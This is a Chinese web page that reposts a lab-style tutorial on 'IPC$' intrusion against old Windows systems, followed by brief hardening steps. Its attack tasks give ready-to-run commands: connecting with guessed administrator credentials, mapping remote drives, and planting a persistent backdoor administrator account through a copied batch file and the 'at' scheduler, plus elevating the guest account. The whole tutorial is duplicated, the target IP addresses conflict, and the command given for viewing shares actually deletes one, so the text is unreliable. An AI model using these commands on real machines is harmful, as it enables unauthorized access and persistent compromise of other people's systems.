豪士君测试所用平台

以下就是我们整理的IPC$入侵方法及防范，一起来看看，希望能帮助到您。

实验概述IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是Windows NT的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。设置IPC$的初衷是为了方便管理员的管理，当该功能切被大量用于网络入侵。默认情况下IPC$是已被共享的，除非手动删除了IPC$。平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。如何查找IPC$漏洞主机？可以使用“流光2000”等软件（http://sec.chinabyte.com/327/9143827.shtml）。2.1.2 IPC$入侵故障处理（1）使用IPC$连接失败时，首先考虑一下几点：远程主机操作系统可能不是Windows NT/2000/XP/2003远程主机可能删除了IPC$共享远程主机未开启139或445端口（或防火墙）查看帮助：net use /?2.1.3 实验步骤任务一：利用已知的系统账号和密码进行入侵假设已经找到了一台这样的主机，地址是202.201.244.100，管理员帐号是Administrator，密码是123456。（1）开始菜单中进入“命令提示符”窗口。（2）建立IPC$连接，命令格式为：net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”连接成功后，将显示“命令成功完成”的提示信息。（3）进行网络驱动器映射，将远程主机上的D$映射为本地的G盘。net use G:\\202.201.244.99\D$ （4）删除网络连接net use * /del任务二：在对方系统上留下后门在远程主机上创建一个后门账号以备将来登陆时使用，编写一个可在远程主机上可以自动运行的文件（例如：批处理文件），利用远程主机的Windows计划任务功能实现远程入侵。(1)创建一个批处理文件（保存为sysdoor.bat），名为sysdoor的用户账号，密码为123456，并将其加入到administrators（系统管理员组中）。net user sysdoor 123456 /addnet localgroup administrators sysdoor /add（2）建立与远程主机的IPC$连接net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”（3）将已创建的批处理文件复制到远程主机上copy sysdoor.bat \\202.201.244.100\d$（4）利用Windows计划任务定期执行批处理文件查看远程主机上当前系统时间：net time \\202.201.244.100让系统在14:00时运行批处理文件：at \\202.201.244.100 14:00 d:\sysdoor.bat（5）断开与远程主机上的IPC$连接net use * /del（6）在14:00以后，尝试使用sysdoor账号就行IPC$连接。备注：也可以直接将对方的guest用户账号激活net user guest /activenet user guest 123456net localgroup administrators guest /add任务三：防御IPC$入侵（1）禁止在连接中进行枚举攻击运行“regedit”命令，打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa，把restrictanonymoussam的值改为1，如下图所示。（2）禁止默认共享首先查看共享资源：net share ipc$ /del删除IPC$共享：net share ipc$ /del删除admin$共享：net share admin$ /del删除d$共享：net share d$ /del备注：添加共享net share c$=c:\net share d$=d:\（3）停止Server服务Net stop server实验概述IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是Windows NT的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。设置IPC$的初衷是为了方便管理员的管理，当该功能切被大量用于网络入侵。默认情况下IPC$是已被共享的，除非手动删除了IPC$。平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。如何查找IPC$漏洞主机？可以使用“流光2000”等软件（http://sec.chinabyte.com/327/9143827.shtml）。2.1.2 IPC$入侵故障处理（1）使用IPC$连接失败时，首先考虑一下几点：远程主机操作系统可能不是Windows NT/2000/XP/2003远程主机可能删除了IPC$共享远程主机未开启139或445端口（或防火墙）查看帮助：net use /?2.1.3 实验步骤任务一：利用已知的系统账号和密码进行入侵假设已经找到了一台这样的主机，地址是202.201.244.100，管理员帐号是Administrator，密码是123456。（1）开始菜单中进入“命令提示符”窗口。（2）建立IPC$连接，命令格式为：net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”连接成功后，将显示“命令成功完成”的提示信息。（3）进行网络驱动器映射，将远程主机上的D$映射为本地的G盘。net use G:\\202.201.244.99\D$ （4）删除网络连接net use * /del任务二：在对方系统上留下后门在远程主机上创建一个后门账号以备将来登陆时使用，编写一个可在远程主机上可以自动运行的文件（例如：批处理文件），利用远程主机的Windows计划任务功能实现远程入侵。(1)创建一个批处理文件（保存为sysdoor.bat），名为sysdoor的用户账号，密码为123456，并将其加入到administrators（系统管理员组中）。net user sysdoor 123456 /addnet localgroup administrators sysdoor /add（2）建立与远程主机的IPC$连接net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”（3）将已创建的批处理文件复制到远程主机上copy sysdoor.bat \\202.201.244.100\d$（4）利用Windows计划任务定期执行批处理文件查看远程主机上当前系统时间：net time \\202.201.244.100让系统在14:00时运行批处理文件：at \\202.201.244.100 14:00 d:\sysdoor.bat（5）断开与远程主机上的IPC$连接net use * /del（6）在14:00以后，尝试使用sysdoor账号就行IPC$连接。备注：也可以直接将对方的guest用户账号激活net user guest /activenet user guest 123456net localgroup administrators guest /add任务三：防御IPC$入侵（1）禁止在连接中进行枚举攻击运行“regedit”命令，打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa，把restrictanonymoussam的值改为1，如下图所示。（2）禁止默认共享首先查看共享资源：net share ipc$ /del删除IPC$共享：net share ipc$ /del删除admin$共享：net share admin$ /del删除d$共享：net share d$ /del备注：添加共享net share c$=c:\net share d$=d:\（3）停止Server服务Net stop server

IPC$入侵方法及防范文章到此结束，字数约4002字，希望可以帮助到大家。豪仕知识网往后会继续推荐IPC$入侵方法及防范相关内容。